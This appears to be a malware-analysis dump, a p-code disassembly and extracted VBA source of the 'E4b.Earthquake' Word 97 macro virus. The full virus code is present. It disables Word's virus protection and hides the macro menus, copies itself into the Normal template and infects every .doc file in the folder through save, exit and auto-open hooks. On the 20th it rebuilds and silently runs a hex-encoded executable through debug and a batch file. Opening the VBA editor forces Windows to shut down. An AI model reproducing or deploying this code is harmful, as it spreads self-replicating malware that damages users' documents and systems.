03 01 16 08 01" Print #hFile, "E 0F10 00 05 00 03 01 BB 08 01 00 06 00 03 01 5D 08 01" Print #hFile, "E 0F20 00 07 00 03 01 0C 09 02 00 01 00 03 01 20 05 01" Print #hFile, "E 0F30 00 89 00 05 01 B4 07 01 00 72 00 03 01 DF 08 01" Print #hFile, "E 0F40 00 0A 00 03 01 89 00 02 00 05 00 03 01 EF 0A 02" Print #hFile, "E 0F50 00 06 00 03 01 8F 06 01 00 10 00 03 01 81 0A 02" Print #hFile, "E 0F60 00 0A 00 03 01 E8 0A 02 00 0C 00 03 01 9D 06 01" Print #hFile, "E 0F70 00 14 00 03 01 0A 08 01 00 17 00 03 01 22 08 01" Print #hFile, "E 0F80 00 18 00 03 01 80 00 01 00 1E 00 03 01 FC 08 02" Print #hFile, "E 0F90 00 17 00 03 01 47 0B 02 00 1F 00 03 01 6D 0B 02" Print #hFile, "E 0FA0 00 20 00 03 01 5B 0B 02 00 23 00 03 01 90 0A 02" Print #hFile, "E 0FB0 00 A4 01 03 01 CA 09 02 00 29 00 03 01 F9 02 01" Print #hFile, "E 0FC0 00 31 00 03 01 D9 09 02 00 2A 00 03 01 C5 0A 01" Print #hFile, "E 0FD0 00 33 00 03 01 DD 0A 01 00 34 00 03 01 78 09 02" Print #hFile, "E 0FE0 00 AE 00 03 01 75 0A 01 00 39 00 03 01 51 0B 02" Print #hFile, "E 0FF0 00 31 00 03 01 A5 0A 01 00 3B 00 03 01 55 0A 02" Print #hFile, "E 1000 00 B3 00 03 01 0A 0B 02 00 36 00 03 01 2C 0C 02" Print #hFile, "E 1010 00 38 00 03 01 9F 09 02 00 39 00 03 01 2A 0B 02" Print #hFile, "E 1020 00 3A 00 05 01 10 00 01 00 B2 00 03 01 1E 00 01" Print #hFile, "E 1030 00 5B 00 03 01 8C 02 01 00 66 00 03 01 48 0A 02" Print #hFile, "E 1040 00 6B 00 03 01 0A 0A 02 00 6C 00 00 00 00 00 00" Print #hFile, "E 1050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #hFile, "E 1060 00 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00" Print #hFile, "E 1070 00 00 00 00 00 00 00 00 00 00 00 00 01 00 FF FF" Print #hFile, "E 1080 00 00 00 00 5F 43 5F 46 49 4C 45 5F 49 4E 46 4F" Print #hFile, "E 1090 3D 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #hFile, "E 10A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 01" Print #hFile, "E 10B0 00 00 14 00 14 00 28 00 00 00 00 00 00 00 00 00" Print #hFile, "E 10C0 00 00 00 00 00 00 00 00 00 00 00 00 C1 00 00 00" Print #hFile, "E 10D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #hFile, "E 10E0 00 00 00 00 00 00 8A 00 00 00 00 00 00 00 00 00" Print #hFile, "E 10F0 00 00 00 00 00 00 00 10 01 00 00 00 00 00 00 00" Print #hFile, "E 1100 00 00 41 6C 6F 61 70 00 41 6C 6F 61 70 20 41 70" Print #hFile, "E 1110 70 20 41 6C 72 65 61 64 79 20 52 75 6E 6E 69 6E" Print #hFile, "E 1120 67 00 61 6C 6F 61 70 69 63 6F 00 00 41 4C 4F 41" Print #hFile, "E 1130 50 57 6E 64 43 6C 61 73 73 00 41 6C 6F 61 70 20" Print #hFile, "E 1140 57 69 6E 64 6F 77 00 00 54 69 6D 65 72 00 25 64" Print #hFile, "E 1150 00 00 20 53 74 65 66 61 6E 6F 20 50 65 72 6F 74" Print #hFile, "E 1160 74 6F 20 2D 20 31 39 39 34 00 50 72 6F 6A 65 63" Print #hFile, "E 1170 74 00 23 33 32 37 37 32 00 00 00 00 00 00 00 00" Print #hFile, "E 1180 00 00 00 00 00 00 00 00 3C 3C 4E 4D 53 47 3E 3E" Print #hFile, "E 1190 00 00 52 36 30 30 30 0D 0A 2D 20 73 74 61 63 6B" Print #hFile, "E 11A0 20 6F 76 65 72 66 6C 6F 77 0D 0A 00 03 00 52 36" Print #hFile, "E 11B0 30 30 33 0D 0A 2D 20 69 6E 74 65 67 65 72 20 64" Print #hFile, "E 11C0 69 76 69 64 65 20 62 79 20 30 0D 0A 00 09 00 52" Print #hFile, "E 11D0 36 30 30 39 0D 0A 2D 20 6E 6F 74 20 65 6E 6F 75" Print #hFile, "E 11E0 67 68 20 73 70 61 63 65 20 66 6F 72 20 65 6E 76" Print #hFile, "E 11F0 69 72 6F 6E 6D 65 6E 74 0D 0A 00 12 00 52 36 30" Print #hFile, "E 1200 31 38 0D 0A 2D 20 75 6E 65 78 70 65 63 74 65 64" Print #hFile, "E 1210 20 68 65 61 70 20 65 72 72 6F 72 0D 0A 00 14 00" Print #hFile, "E 1220 52 36 30 32 30 0D 0A 2D 20 75 6E 65 78 70 65 63" Print #hFile, "E 1230 74 65 64 20 51 75 69 63 6B 57 69 6E 20 65 72 72" Print #hFile, "E 1240 6F 72 0D 0A 00 08 00 52 36 30 30 38 0D 0A 2D 20" Print #hFile, "E 1250 6E 6F 74 20 65 6E 6F 75 67 68 20 73 70 61 63 65" Print #hFile, "E 1260 20 66 6F 72 20 61 72 67 75 6D 65 6E 74 73 0D 0A" Print #hFile, "E 1270 00 15 00 52 36 30 32 31 0D 0A 2D 20 6E 6F 20 6D" Print #hFile, "E 1280 61 69 6E 20 70 72 6F 63 65 64 75 72 65 0D 0A 00" Print #hFile, "E 1290 FC 00 0D 0A 00 FF 00 72 75 6E 2D 74 69 6D 65 20" Print #hFile, "E 12A0 65 72 72 6F 72 20 00 02 00 52 36 30 30 32 0D 0A" Print #hFile, "E 12B0 2D 20 66 6C 6F 61 74 69 6E 67 2D 70 6F 69 6E 74" Print #hFile, "E 12C0 20 73 75 70 70 6F 72 74 20 6E 6F 74 20 6C 6F 61" Print #hFile, "E 12D0 64 65 64 0D 0A 00 FF FF FF 00 00 00 00 00 00 00" Print #hFile, "E 12E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #hFile, "E 12F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #hFile, "E 1300 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #hFile, "E 1310 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #hFile, "E 1320 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #hFile, "E 1330 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #hFile, "E 1340 00 00 01 00 01 00 20 20 10 00 01 00 04 00 E8 02" Print #hFile, "E 1350 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #hFile, "E 1360 28 00 00 00 20 00 00 00 40 00 00 00 01 00 04 00" Print #hFile, "E 1370 00 00 00 00 80 02 00 00 00 00 00 00 00 00 00 00" Print #hFile, "E 1380 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00" Print #hFile, "E 1390 00 80 00 00 00 80 80 00 80 00 00 00 80 00 80 00" Print #hFile, "E 13A0 80 80 00 00 80 80 80 00 C0 C0 C0 00 00 00 FF 00" Print #hFile, "E 13B0 00 FF 00 00 00 FF FF 00 FF 00 00 00 FF 00 FF 00" Print #hFile, "E 13C0 FF FF 00 00 FF FF FF 00 00 00 00 00 00 00 00 00" Print #hFile, "E 13D0 00 00 00 00 00 00 00 00 FF FF FF FF FF FF FF FF" Print #hFile, "E 13E0 FF FF FF FF FF FF FF 00 FF FF FF FF FF FF FF FF" Print #hFile, "E 13F0 FF FF FF FF FF FF FF 00 FF 9F FF FF FF FF FF FF" Print #hFile, "E 1400 FF FF FF FF FF FF FF 00 FF 9F FF FF FF FF FF FF" Print #hFile, "E 1410 FF FF FF FF FF FF FF 00 FF 9F FF FF FF FF FF FF" Print #hFile, "E 1420 FF FF FF FF F9 FF FF 00 FF F9 99 9F FF FF FF FF" Print #hFile, "E 1430 FF FF FF FF 9F 9F FF 00 FF FF FF F9 99 9F FF FF" Print #hFile, "E 1440 FF FF FF F9 FF F9 FF 00 FF FF FF FF FF 9F FF FF" Print #hFile, "E 1450 FF FF FF 9F FF FF FF 00 FF FF FF FF FF F9 FF FF" Print #hFile, "E 1460 FF FF F9 FF FF FF FF 00 FF FF FF FF FF F9 9F FF" Print #hFile, "E 1470 FF FF F9 FF FF FF FF 00 FF FF FF FF FF FF 9F FF" Print #hFile, "E 1480 FF FF 99 FF FF FF FF 00 FF FF FF FF FF FF 99 99" Print #hFile, "E 1490 99 99 9F FF FF FF FF 00 FF FF FF FF FF FF F9 99" Print #hFile, "E 14A0 FF FF FF FF FF FF FF 00 FF FF FF FF FF FF F9 99" Print #hFile, "E 14B0 FF FF FF FF FF FF FF 00 FF FF FF 9F FF FF FF 99" Print #hFile, "E 14C0 9F FF FF F9 FF FF FF 00 FF FF FF F9 FF FF FF F9" Print #hFile, "E 14D0 9F FF FF 9F 9F FF FF 00 FF FF FF FF 9F FF FF FF" Print #hFile, "E 14E0 99 FF 99 FF F9 FF FF 00 FF FF FF FF F9 FF FF FF" Print #hFile, "E 14F0 99 F9 FF FF FF 9F FF 00 FF FF FF FF FF 9F FF FF" Print #hFile, "E 1500 99 9F FF FF FF FF FF 00 FF FF FF FF FF F9 99 99" Print #hFile, "E 1510 99 9F FF FF FF FF FF 00 FF FF FF FF FF FF FF FF" Print #hFile, "E 1520 FF 9F FF FF FF FF FF 00 FF FF FF FF FF FF FF FF" Print #hFile, "E 1530 FF 99 99 FF FF FF FF 00 FF FF FF FF FF FF FF FF" Print #hFile, "E 1540 FF F9 99 9F FF FF FF 00 FF FF FF FF FF FF FF FF" Print #hFile, "E 1550 FF F9 99 99 FF FF FF 00 FF FF FF FF FF FF FF FF" Print #hFile, "E 1560 FF FF 99 99 FF FF FF 00 FF FF FF FF FF FF FF FF" Print #hFile, "E 1570 FF FF F9 9F FF FF FF 00 FF FF FF FF FF FF FF FF" Print #hFile, "E 1580 FF FF FF FF FF FF FF 00 FF FF FF FF FF FF FF FF" Print #hFile, "E 1590 FF FF FF FF FF FF FF 00 FF FF FF FF FF FF FF FF" Print #hFile, "E 15A0 FF FF FF FF FF FF FF 00 00 00 00 00 00 00 00 00" Print #hFile, "E 15B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #hFile, "E 15C0 00 00 00 00 00 00 00 00 FF FF FF FF 00 00 00 03" Print #hFile, "E 15D0 00 00 00 03 00 00 00 03 00 00 00 03 00 00 00 03" Print #hFile, "E 15E0 00 00 00 03 00 00 00 03 00 00 00 03 00 00 00 03" Print #hFile, "E 15F0 00 00 00 03 00 00 00 03 00 00 00 03 00 00 00 03" Print #hFile, "E 1600 00 00 00 03 00 00 00 03 00 00 00 03 00 00 00 03" Print #hFile, "E 1610 00 00 00 03 00 00 00 03 00 00 00 03 00 00 00 03" Print #hFile, "E 1620 00 00 00 03 00 00 00 03 00 00 00 03 00 00 00 03" Print #hFile, "E 1630 00 00 00 03 00 00 00 03 00 00 00 03 00 00 00 03" Print #hFile, "E 1640 FF FF FF FF FF FF FF FF 00 00 00 00 00 00 00 00" Print #hFile, "RCX" Print #hFile, "1550" Print #hFile, "W" Print #hFile, "Q" Close hFile End Sub Sub startv(strFile As String) Dim hFile As Long Close hFile On Error Resume Next hFile = FreeFile Open strFile For Output Access Write As hFile Print #hFile, "@echo off" Print #hFile, "cd\" Print #hFile, "debug < start.scr > nul" Print #hFile, "copy start.com start.exe" Print #hFile, "del start.com" Print #hFile, "del start.scr" Print #hFile, "start" Print #hFile, "del start.com" Print #hFile, "del startv.bat" Close hFile Shell ("c:\startv.bat"), vbHide End Sub ' Processing file: /tmp/qstore_wrjsm3id ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 1182 bytes ' Macros/VBA/E4 - 47546 bytes ' Line #0: ' Line #1: ' Line #2: ' FuncDefn (Sub E4()) ' Line #3: ' OnError (Resume Next) ' Line #4: ' Line #5: ' QuoteRem 0x0000 0x0019 " The E4b.Earthquake Virus" ' Line #6: ' QuoteRem 0x0000 0x001C " Based on the E4b Virus Core" ' Line #7: ' QuoteRem 0x0000 0x0026 " Word 97 Macro Virus all Service Packs" ' Line #8: ' QuoteRem 0x0000 0x001D " Created on the 21st May 2000" ' Line #9: ' QuoteRem 0x0000 0x0030 " Created for Testing & Educational Purposes ONLY" ' Line #10: ' QuoteRem 0x0000 0x0021 " Not for Main Stream Distribution" ' Line #11: ' Line #12: ' LitVarSpecial (False) ' Ld Options ' MemSt ConfirmConversions ' Line #13: ' LitVarSpecial (False) ' Ld Options ' MemSt VirusProtection ' Line #14: ' LitVarSpecial (False) ' Ld Options ' MemSt SaveNormalPrompt ' Line #15: ' LitStr 0x0005 "Macro" ' LitStr 0x0005 "Tools" ' ArgsLd CommandBars 0x0001 ' ArgsMemLd Controls 0x0001 ' ArgsMemCall Delete 0x0000 ' Line #16: ' LitStr 0x0018 "Templates and Add-Ins..." ' LitStr 0x0005 "Tools" ' ArgsLd CommandBars 0x0001 ' ArgsMemLd Controls 0x0001 ' ArgsMemCall Delete 0x0000 ' Line #17: ' LitStr 0x0008 "Style..." ' LitStr 0x0006 "Format" ' ArgsLd CommandBars 0x0001 ' ArgsMemLd Controls 0x0001 ' ArgsMemCall Delete 0x0000 ' Line #18: ' ArgsLd Now 0x0000 ' ArgsLd Day 0x0001 ' LitDI2 0x0014 ' Eq ' If ' BoSImplicit ' LitStr 0x000C "C:\start.scr" ' ArgsCall (Call) Prog 0x0001 ' EndIf ' Line #19: ' ArgsLd Now 0x0000 ' ArgsLd Day 0x0001 ' LitDI2 0x0014 ' Eq ' If ' BoSImplicit ' LitStr 0x000D "c:\startv.bat" ' ArgsCall (Call) startv 0x0001 ' EndIf ' Line #20: ' LitStr 0x0009 "c:\E4.sys" ' LitStr 0x0002 "E4" ' Ld Application ' MemLd VBE ' MemLd ActiveVBProject ' ArgsMemLd VBComponents 0x0001 ' ArgsMemCall Export 0x0001 ' Line #21: ' StartForVariable ' Ld I ' EndForVariable ' LitDI2 0x0001 ' Ld NormalTemplate ' MemLd VBProject ' MemLd VBComponents ' MemLd Count ' For ' Line #22: ' Ld I ' Ld NormalTemplate ' MemLd VBProject ' ArgsMemLd VBComponents 0x0001 ' MemLd New ' LitStr 0x0002 "E4" ' Eq ' If ' BoSImplicit ' LitVarSpecial (True) ' St NormInstall ' EndIf ' Line #23: ' StartForVariable ' Ld I ' EndForVariable ' NextVar ' Line #24: ' StartForVariable ' Ld I ' EndForVariable ' LitDI2 0x0001 ' Ld ActiveDocument ' MemLd VBProject ' MemLd VBComponents ' MemLd Count ' For ' Line #25: ' Ld I ' Ld ActiveDocument ' MemLd VBProject ' ArgsMemLd VBComponents 0x0001 ' MemLd New ' LitStr 0x0002 "E4" ' Eq ' If ' BoSImplicit ' LitVarSpecial (True) ' St ActivInstall ' EndIf ' Line #26: ' StartForVariable ' Ld I ' EndForVariable ' NextVar ' Line #27: ' LineCont 0x0004 0F 00 00 00 ' Ld ActivInstall ' LitVarSpecial (True) ' Eq ' Ld NormInstall ' LitVarSpecial (False) ' Eq ' And ' If ' BoSImplicit ' SetStmt ' Ld NormalTemplate ' MemLd VBProject ' Set Lotion ' Else ' BoSImplicit ' Ld ActivInstall ' LitVarSpecial (False) ' Eq ' Ld NormInstall ' LitVarSpecial (True) ' Eq ' And ' If ' BoSImplicit ' SetStmt ' Ld ActiveDocument ' MemLd VBProject ' Set Lotion ' EndIf ' EndIf ' Line #28: ' LitStr 0x0009 "c:\E4.sys" ' Paren ' Ld Lotion ' MemLd VBComponents ' ArgsMemCall Import 0x0001 ' Line #29: ' EndSub ' Line #30: ' Line #31: ' FuncDefn (Sub FileNew()) ' Line #32: ' OnError (Resume Next) ' Line #33: ' ArgsCall (Call) E4 0x0000 ' Line #34: ' Ld wdDialogFileNew ' ArgsLd Dialogs 0x0001 ' ArgsMemCall Show 0x0000 ' Line #35: ' LitDI2 0x0001 ' St Skip ' Line #36: ' ArgsCall (Call) E4 0x0000 ' Line #37: ' EndSub ' Line #38: ' FuncDefn (Sub FileSave()) ' Line #39: ' OnError (Resume Next) ' Line #40: ' ArgsCall (Call) E4 0x0000 ' Line #41: ' Ld ActiveDocument ' ArgsMemCall Save 0x0000 ' Line #42: ' EndSub ' Line #43: ' FuncDefn (Sub FileClose()) ' Line #44: ' OnError (Resume Next) ' Line #45: ' ArgsCall (Call) E4 0x0000 ' Line #46: ' Ld ActiveDocument ' MemLd Saved ' LitVarSpecial (False) ' Eq ' If ' BoSImplicit ' Ld ActiveDocument ' ArgsMemCall Save 0x0000 ' EndIf ' Line #47: ' Ld ActiveDocument ' ArgsMemCall Close 0x0000 ' Line #48: ' EndSub ' Line #49: ' FuncDefn (Sub ToolsOptions()) ' Line #50: ' OnError (Resume Next) ' Line #51: ' Ld wdDialogToolsOptions ' ArgsLd Dialogs 0x0001 ' ArgsMemCall Show 0x0000 ' Line #52: ' ArgsCall (Call) E4 0x0000 ' Line #53: ' EndSub ' Line #54: ' FuncDefn (Sub EditFind()) ' Line #55: ' OnError (Resume Next) ' Line #56: ' Ld wdDialogEditFind ' ArgsLd Dialogs 0x0001 ' ArgsMemCall Show 0x0000 ' Line #57: ' ArgsCall (Call) E4 0x0000 ' Line #58: ' EndSub ' Line #59: ' FuncDefn (Sub FileSaveAs()) ' Line #60: ' OnError (Resume Next) ' Line #61: ' Ld wdDialogFileSaveAs ' ArgsLd Dialogs 0x0001 ' ArgsMemCall Show 0x0000 ' Line #62: ' ArgsCall (Call) E4 0x0000 ' Line #63: ' EndSub ' Line #64: ' FuncDefn (Sub FilePrint()) ' Line #65: ' OnError (Resume Next) ' Line #66: ' Ld wdDialogFilePrint ' ArgsLd Dialogs 0x0001 ' ArgsMemCall Show 0x0000 ' Line #67: ' ArgsCall (Call) E4 0x0000 ' Line #68: ' EndSub ' Line #69: ' Line #70: ' FuncDefn (Sub FileExit()) ' Line #71: ' OnError (Resume Next) ' Line #72: ' ArgsCall (Call) E4 0x0000 ' Line #73: ' Ld ActiveDocument ' MemLd Saved ' LitVarSpecial (False) ' Eq ' If ' BoSImplicit ' Ld ActiveDocument ' ArgsMemCall Save 0x0000 ' EndIf ' Line #74: ' Ld wdWindowStateMinimize ' Ld Application ' MemSt WindowState ' Line #75: ' Ld CurDir ' LitStr 0x0001 "\" ' Concat ' St pName ' Line #76: ' Ld pName ' LitStr 0x0005 ".doc" ' Concat ' Ld sAttr ' ArgsLd Dir 0x0002 ' St fName ' Line #77: ' Ld fName ' LitStr 0x0000 "" ' Ne ' Paren ' Ld fName ' LitStr 0x0001 "." ' Ne ' Paren ' Ld fName ' LitStr 0x0002 ".." ' Ne ' Paren ' And ' Paren ' And ' If ' BoSImplicit ' Ld pName ' Ld fName ' Concat ' St InfectDoc ' EndIf ' Line #78: ' LineCont 0x0004 0D 00 00 00 ' Ld InfectDoc ' ParamNamed FileName ' LitVarSpecial (False) ' ParamNamed ConfirmConversions ' LitVarSpecial (False) ' ParamNamed ReadOnly ' LitVarSpecial (False) ' ParamNamed AddToRecentFiles ' LitStr 0x0000 "" ' ParamNamed PasswordDocument ' Ld Documents ' ArgsMemCall Option 0x0005 ' Line #79: ' ArgsCall (Call) E4 0x0000 ' Line #80: ' Ld fName ' LitStr 0x0000 "" ' Ne ' Paren ' DoWhile ' Line #81: ' ArgsLd Dir 0x0000 ' St fName ' Line #82: ' LineCont 0x0004 07 00 00 00 ' Ld fName ' LitStr 0x0000 "" ' Ne ' Paren ' Ld fName ' LitStr 0x0001 "." ' Ne ' Paren ' Ld fName ' LitStr 0x0002 ".." ' Ne ' Paren ' And ' Paren ' And ' IfBlock ' Line #83: ' Ld pName ' Ld fName ' Concat ' St InfectDoc ' Line #84: ' LineCont 0x0004 0D 00 00 00 ' Ld InfectDoc ' ParamNamed FileName ' LitVarSpecial (False) ' ParamNamed ConfirmConversions ' LitVarSpecial (False) ' ParamNamed ReadOnly ' LitVarSpecial (False) ' ParamNamed AddToRecentFiles ' LitStr 0x0000 "" ' ParamNamed PasswordDocument ' Ld Documents ' ArgsMemCall Option 0x0005 ' Line #85: ' ArgsCall (Call) E4 0x0000 ' Line #86: ' Ld ActiveDocument ' MemLd Saved ' LitVarSpecial (False) ' Eq ' If ' BoSImplicit ' Ld ActiveDocument ' ArgsMemCall Save 0x0000 ' EndIf ' Line #87: ' EndIfBlock ' Line #88: ' Loop ' Line #89: ' Ld Application ' ArgsMemCall Quit 0x0000 ' Line #90: ' EndSub ' Line #91: ' Line #92: ' FuncDefn (Sub AutoExit()) ' Line #93: ' OnError (Resume Next) ' Line #94: ' ArgsCall (Call) E4 0x0000 ' Line #95: ' Ld wdWindowStateMinimize ' Ld Application ' MemSt WindowState ' Line #96: ' Ld CurDir ' LitStr 0x0001 "\" ' Concat ' St pName ' Line #97: ' Ld pName ' LitStr 0x0005 ".doc" ' Concat ' Ld sAttr ' ArgsLd Dir 0x0002 ' St fName ' Line #98: ' Ld fName ' LitStr 0x0000 "" ' Ne ' Paren ' Ld fName ' LitStr 0x0001 "." ' Ne ' Paren ' Ld fName ' LitStr 0x0002 ".." ' Ne ' Paren ' And ' Paren ' And ' If ' BoSImplicit ' Ld pName ' Ld fName ' Concat ' St InfectDoc ' EndIf ' Line #99: ' LineCont 0x0004 0D 00 00 00 …

SHA-256: 5c5d33b0f30a71c0581315a7e78fbe58d523916b1e563b533a85239c29116f11

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "E4"


Sub E4()
On Error Resume Next

' The E4b.Earthquake Virus
' Based on the E4b Virus Core
' Word 97 Macro Virus all Service Packs
' Created on the 21st May 2000
' Created for Testing & Educational Purposes ONLY
' Not for Main Stream Distribution

Options.ConfirmConversions = False
Options.VirusProtection = False
Options.SaveNormalPrompt = False
CommandBars("Tools").Controls("Macro").Delete
CommandBars("Tools").Controls("Templates and Add-Ins...").Delete
CommandBars("Format").Controls("Style...").Delete
If Day(Now()) = 20 Then Call Prog("C:\start.scr")
If Day(Now()) = 20 Then Call startv("c:\startv.bat")
Application.VBE.ActiveVBProject.VBComponents("E4").Export "c:\E4.sys"
For I = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(I).Name = "E4" Then NormInstall = True
Next I
For I = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(I).Name = "E4" Then ActivInstall = True
Next I
If ActivInstall = True And NormInstall = False Then Set Lotion = NormalTemplate.VBProject _
Else If ActivInstall = False And NormInstall = True Then Set Lotion = ActiveDocument.VBProject
Lotion.VBComponents.Import ("c:\E4.sys")
End Sub

Sub FileNew()
    On Error Resume Next
    Call E4
Dialogs(wdDialogFileNew).Show
    Skip = 1
    Call E4
End Sub
Sub FileSave()
    On Error Resume Next
    Call E4
    ActiveDocument.Save
End Sub
Sub FileClose()
    On Error Resume Next
    Call E4
    If ActiveDocument.Saved = False Then ActiveDocument.Save
    ActiveDocument.Close
End Sub
Sub ToolsOptions()
    On Error Resume Next
Dialogs(wdDialogToolsOptions).Show
    Call E4
End Sub
Sub EditFind()
    On Error Resume Next
Dialogs(wdDialogEditFind).Show
    Call E4
End Sub
Sub FileSaveAs()
    On Error Resume Next
Dialogs(wdDialogFileSaveAs).Show
    Call E4
End Sub
Sub FilePrint()
    On Error Resume Next
Dialogs(wdDialogFilePrint).Show
    Call E4
End Sub

Sub FileExit()
    On Error Resume Next
    Call E4
    If ActiveDocument.Saved = False Then ActiveDocument.Save
Application.WindowState = wdWindowStateMinimize
pName = CurDir & "\"
fName = Dir(pName & "*.doc", sAttr)
If (fName <> "") And ((fName <> ".") And (fName <> "..")) Then InfectDoc = pName & fName
Documents.Open FileName:=InfectDoc, ConfirmConversions:=False, ReadOnly:= _
False, AddToRecentFiles:=False, PasswordDocument:=""
Call E4
Do While (fName <> "")
fName = Dir()
If (fName <> "") And _
((fName <> ".") And (fName <> "..")) Then
InfectDoc = pName & fName
Documents.Open FileName:=InfectDoc, ConfirmConversions:=False, ReadOnly:= _
False, AddToRecentFiles:=False, PasswordDocument:=""
    Call E4
If ActiveDocument.Saved = False Then ActiveDocument.Save
End If
Loop
    Application.Quit
End Sub

Sub AutoExit()
    On Error Resume Next
    Call E4
Application.WindowState = wdWindowStateMinimize
pName = CurDir & "\"
fName = Dir(pName & "*.doc", sAttr)
If (fName <> "") And ((fName <> ".") And (fName <> "..")) Then InfectDoc = pName & fName
Documents.Open FileName:=InfectDoc, ConfirmConversions:=False, ReadOnly:= _
False, AddToRecentFiles:=False, PasswordDocument:=""
Call E4
Do While (fName <> "")
fName = Dir()
If (fName <> "") And _
((fName <> ".") And (fName <> "..")) Then
InfectDoc = pName & fName
Documents.Open FileName:=InfectDoc, ConfirmConversions:=False, ReadOnly:= _
False, AddToRecentFiles:=False, PasswordDocument:=""
    Call E4
If ActiveDocument.Saved = False Then ActiveDocument.Save
End If
Loop
End Sub

Sub AutoOpen()
    On Error Resume Next
    Call E4
End Sub
Sub AutoExec()
    On Error Resume Next
    Call E4
End Sub
Sub AutoClose()
    On Error Resume Next
    Call E4
End Sub

Sub ToolsMacro()
    On Error Resume Next
    Call EPay
End Sub
Sub FileTemplates()
    On Error Resume Next
    Call EPay
End Sub
Sub ViewVBCode()
    On Error Resume Next
    Call EPay
End Sub

Sub EPay()
    On Error Resume Next
    If ActiveDocument.Saved = False Then ActiveDocument.Save
Tasks.ExitWindows
End Sub

Sub Prog(strFile As String)
    On Error Resume Next
Dim hFile As Long
    hFile = FreeFile
    Open strFile For Output Access Write As hFile
Print #hFile, "N start.com"
Print #hFile, "E 0100 4D 5A 36 01 01 00 00 00 04 00 00 00 FF FF 00 00"
Print #hFile, "E 0110 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00"
Print #hFile, "E 0120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #hFile, "E 0130 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00"
Print #hFile, "E 0140 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68"
Print #hFile, "E 0150 69 73 20 70 72 6F 67 72 61 6D 20 72 65 71 75 69"
Print #hFile, "E 0160 72 65 73 20 4D 69 63 72 6F 73 6F 66 74 20 57 69"
Print #hFile, "E 0170 6E 64 6F 77 73 2E 0D 0A 24 00 00 00 00 00 00 00"
Print #hFile, "E 0180 4E 45 05 3C 9F 00 0F 00 00 00 00 00 02 03 02 00"
Print #hFile, "E 0190 00 04 00 14 1A 00 01 00 00 00 02 00 02 00 02 00"
Print #hFile, "E 01A0 3D 00 40 00 50 00 85 00 8E 00 92 00 2E 01 00 00"
Print #hFile, "E 01B0 02 00 04 00 00 00 02 08 18 00 0C 01 00 00 0A 03"
Print #hFile, "E 01C0 1A 00 39 0C 50 1D 39 0C F6 00 94 02 51 0C 94 02"
Print #hFile, "E 01D0 04 00 0E 80 01 00 00 00 00 00 24 01 02 00 30 1C"
Print #hFile, "E 01E0 2C 00 00 00 00 00 03 80 01 00 00 00 00 00 26 01"
Print #hFile, "E 01F0 2F 00 30 1C 01 80 00 00 00 00 00 00 08 41 4C 4F"
Print #hFile, "E 0200 41 50 49 43 4F 05 41 4C 4F 41 50 00 00 00 01 00"
Print #hFile, "E 0210 08 00 00 06 4B 45 52 4E 45 4C 04 55 53 45 52 02"
Print #hFile, "E 0220 FF 01 CD 3F 01 16 0A 01 CD 3F 01 18 0B 00 15 41"
Print #hFile, "E 0230 20 6D 69 6E 69 6D 75 6D 20 41 70 70 6C 69 63 61"
Print #hFile, "E 0240 74 69 6F 6E 00 00 09 45 58 43 49 54 50 52 4F 43"
Print #hFile, "E 0250 02 00 15 4F 56 45 52 4C 41 50 50 45 44 57 49 4E"
Print #hFile, "E 0260 44 4F 57 50 52 4F 43 31 01 00 00 00 00 00 00 00"
Print #hFile, "E 0270 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #hFile, "E 0280 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #hFile, "E 0290 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #hFile, "E 02A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #hFile, "E 02B0 FF FF B0 FF 50 9A DD 01 3C 0B 33 ED 55 9A FF FF"
Print #hFile, "E 02C0 00 00 0B C0 74 EC 8C 06 46 00 81 C1 00 01 72 E2"
Print #hFile, "E 02D0 89 0E 10 00 89 36 12 00 89 3E 14 00 89 1E 16 00"
Print #hFile, "E 02E0 8C 06 18 00 89 16 1A 00 9A FF FF 00 00 86 C4 A3"
Print #hFile, "E 02F0 48 00 B4 30 2E F7 06 10 00 01 00 74 07 9A FF FF"
Print #hFile, "E 0300 00 00 EB 02 CD 21 A3 4C 00 86 C4 A3 4A 00 2E F7"
Print #hFile, "E 0310 06 10 00 01 00 75 05 B0 00 A2 4F 00 33 C0 50 9A"
Print #hFile, "E 0320 FF FF 00 00 FF 36 14 00 9A FF FF 00 00 0B C0 74"
Print #hFile, "E 0330 81 9A F0 00 18 00 9A D4 02 94 00 9A 56 04 99 00"
Print #hFile, "E 0340 E8 43 07 FF 36 84 00 FF 36 82 00 FF 36 80 00 9A"
Print #hFile, "E 0350 C4 00 9E 00 83 C4 06 50 9A CF 01 B2 00 B8 15 00"
Print #hFile, "E 0360 E9 28 04 00 8C D8 90 45 55 8B EC 1E 8E D8 FF 36"
